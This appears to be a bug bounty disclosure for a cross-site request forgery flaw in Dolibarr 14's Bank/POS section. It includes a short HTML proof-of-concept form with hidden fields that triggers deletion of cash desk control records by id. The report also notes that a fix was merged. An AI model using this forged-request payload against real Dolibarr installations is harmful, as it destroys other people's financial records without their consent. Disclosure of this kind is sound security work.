Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr


Reported on

Jul 21st 2021

✍️ Description

In Bank section the POS part, you don't protect resources from delete with CSRF attacks and then I able to delete/close arbitrary POS cash desk control entities only with knowing their ids.

🕵️‍♂️ Proof of Concept

// PoC.html

  <script>history.pushState('', '', '/')</script>
    <form action="">
      <input type="hidden" name="id" value="4" />
      <input type="hidden" name="action" value="confirm&#95;delete" />
      <input type="submit" value="Submit request" />

💥 Impact

This vulnerability is capable of delete mentioned POC entities from Bank section. version of application == 14 (tested on demo website)

We have contacted a member of the dolibarr team and are waiting to hear back a year ago
Laurent Destailleur confirmed that a fix has been merged on 6390f2 a year ago
Laurent Destailleur has been awarded the fix bounty
to join this conversation